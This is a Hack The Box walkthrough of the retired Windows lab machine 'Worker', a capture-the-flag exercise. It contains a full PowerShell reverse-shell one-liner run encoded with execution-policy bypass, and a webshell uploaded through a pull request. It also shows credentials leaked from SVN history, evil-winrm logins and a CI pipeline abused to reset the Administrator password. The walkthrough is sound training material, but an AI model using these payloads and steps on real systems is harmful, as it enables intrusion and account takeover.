📗
Hack The Box Walkthroughs
  • Retired HTB Walkthroughs
  • HTB
    • Hack The Box - Lame Walkthrough without Metasploit
    • Hack The Box - Shocker Walkthrough without Metasploit
    • Hack The Box - Doctor Walkthrough without Metasploit
    • Hack The Box - Laboratory Walkthrough without Metasploit
    • Hack The Box - Jewel Walkthrough without Metasploit
    • Hack The Box - Feline Walkthrough without Metasploit
    • Hack The Box - BrainFuck Walkthrough without Metasploit
    • Hack The Box - CrossFit Walkthrough without Metasploit
  • Hack The Box - Legacy Walkthrough without Metasploit
  • Hack The Box - Blue Walkthrough without Metasploit
  • Hack The Box - Jerry Walkthrough without Metasploit
  • Hack The Box - Worker Walkthrough without Metasploit
  • Resources
    • Cyber News
Powered by GitBook
On this page
  • Enumeration
  • Http
  • Svn
  • Exploitation
  • Foothold
  • Internal Enumeration
  • Impersonating the user
  • Privilege Escalation
  • Pwnd

Was this helpful?

Hack The Box - Worker Walkthrough without Metasploit

Worker: Windows box rated as Medium. We will face a SVN repository, with a bit of enumeration we will be able to enter in the box and then using SVN Pipelines we will gain Administrator access.

PreviousHack The Box - Jerry Walkthrough without MetasploitNextCyber News

Last updated 4 years ago

Was this helpful?

Enumeration

Run nmap against our target 10.10.10.203 with the following flags:

-sC Script scan, equivalent to --script=default

-sV Service version info

-p- Scan all ports

nmap -sC -sV -p- 10.10.10.203

Http

We discover a web page on port 80 which doesn't seem to have much at first glance:

But as always, when we encounter a web page, we run gobuster against it:

gobuster dir -u 10.10.10.203 -w /usr/share/wordlists/dirb/common.txt -t 40 -e

We didn't get much from this port (also ran the command with bigger wordlists and -x to add some common windows extensions such as asp or aspx along with jsp, html, php, db, txt, xml but we got no luck either)

Svn

There's a svn Subversion, running on port 3690.

Subversion: Is a VCS (Version Control System)... it's "like" Git with some differences...

Centralized instead of distributed

You must be connected to make commits

Each user can have just one copy of the trunk

Branching or merging is... well quite time-consuming

Maybe that's why less than 10% of the professional devs use it... and i guess those that use it are because they are forced to...) But it came like 5 years before Git. In case someone wants to know a bit more about it:

Checkout

We are going to checkout whatever repository we have there:

svn checkout svn://10.10.10.203

The most interesting file here is moved.txt:

We found a new Host to add to our /etc/hosts:

sudo nano /etc/hosts

Now we can try to access that url:

Gathering info from SVN

So, we need some credentials to access here... Let's dig a bit more on that svn repository we just downloaded in order to see if we can find something useful:

svn info

We got the Revision number, which is 5 and the name of a user nathen.

SVN diff

The revision number is actually really important, this means we can compare this revision to the previous four and see if there are some differences:

svn diff -r <Revision Number>

The only change is the moved.txt that we saw before, let's try a different revision:

We can confirm the user nathen and... was there some password in plain text!? We have to take a look at Revision 2:

Repository

Now we have a user nathen and password wendel98, if we try to use it on http://devops.worker.htb

Clicking on SmartHotel360 will take us to the following page:

Here we can see the Repositories:

Exploitation

We are going to try and use the SVN repository to gain access to the box, in order to do so we must be able to make some changes to master and upload a page that allow us to execute commands on the machine, since it's IIS 10.0 the page has to be either asp or aspx.

Foothold

Tried to commit directly on master, but we were unable to do so, we are going to create a new branch, make some changes and then do a pull request.

On Repos go to Branches, New Branch, give your branch a name and Create branch:

Click on our new created branch:

Now upload a cmdasp.aspx (We have one ready to use in our Kali located on '/usr/share/webshells/aspx/cmdasp.aspx')

Click on Upload File(s), browse... and then select our cmdasp.aspx:

We also have to link a work item to the commit:

Now we just click on commit and we'll be able to see the new commit id, and the aspx file on the branch successfully uploaded.

We have to click on Create a pull request (we can see it on the commit id on the previous picture).

Create a New Pull Request of our evilbranch into master, selecting Nathalie (our user) as Reviewer:

If we take a long time to do this process, we may face this problem:

In order to avoid it we have to prepare what we want to do and do it as fast as possible, now we have to repeat the process and will have to use another branch name too.

Once we are back at this point, we have to approve the commit:

And Set auto-complete:

It will automatically complete the pull request

If we go to the master branch now, we should be able to see our cmd page there:

If we look closely, we will see next to master there is a subdomain name spectral so in order to access our new feature we need to add that to our /etc/hosts:

Now if we try to access our new feature:

It was deleted, we really have to move fast in order to be able to get access to this machine it seems. So, we are going to prepare all the steps now, the cmdasp.aspx and the command we will use on it to gain access, which will be an encoded reverse.ps1 script.

We prepare an encoded reverse powershell script

Reverse Powershell script:

$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes=0..655535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback + 'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();

We encode it with our PSEnconder.py:

python3 PSEncoder.py /path/to/our/reverse.ps1

Now on the command shell we have in the page we enter the encoded powershell script with the following arguments

-Exec ByPass

-Nol

-Enc

PowerShell.exe -Exec ByPass -Nol -Enc <Encoded Payload>

Have a netcat listening on the port indicated and click on execute:

Internal Enumeration

First let's take a look at the user we are after:

We can see there are more than one volume on this box:

If we go into that volume and take a look around, we will see a passwd file under svnrepos/www/conf

Impersonating the user

Let's use the tool evil-winrm to enter as robisl with that password:

evil-winrm -i <ip> -u <user> -p <password>

We are in as robisl and we can grab our user flag, now let's try to escalate privileges, in order to do that we are going to try and access the repository as robisl.

Privilege Escalation

Log in devops.worker.htb as robisl

In order to escalate privileges we are going to exploit the Pipelines feature:

Since the Repository is an Azure Repos Git:

Select our Repository:

Create a Starter pipeline:

The important thing here to modify is the script part:

We get rid of everything not needed and change the net user Administrator password on the script:

Save and run:

We wait a bit meanwhile it does everything, we should have this:

Let's try evi-winrm again with our new creds.

Pwnd

We can grab the root flag ;)

Apache Subversion
GitHub - 4st1nus/PSEncoder: A simple python script to encode powershell commandsGitHub
GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentestingGitHub
Logo
Logo
Worker
Worker Enumeration
Page on port 80
Gobuster Scan
SVN checkout
moved.txt
/etc/hosts
devops.worker.htb
SVN Info
Revision 5 vs Revision 4
Revision 5 vs Revision 3
Revision 5 vs Revision 2
Svn Repository
Repos
Master
Branch Creation
evilbranch
Uploading cmdasp.aspx
Work items linked
Committed changes
Pull request
branch deleted
Approve commit
Set Auto-Complete
Set auto-complete accept
Pull Request Completed
cmd aspx included
new subdomain
Error accessing cmdasp
PSEncoder.py
Entering our Reverse shell encoded
Listening on our Kali
User robisl
Volume W
robisl password
Evil-Winrm as user
Repository as Robin
New Pipeline
Azure Repos Git
Repository
Starter Pipeline
Default pipeline
Modified Pipeline
Run Pipeline
Pipeline executed
Administrator
Logo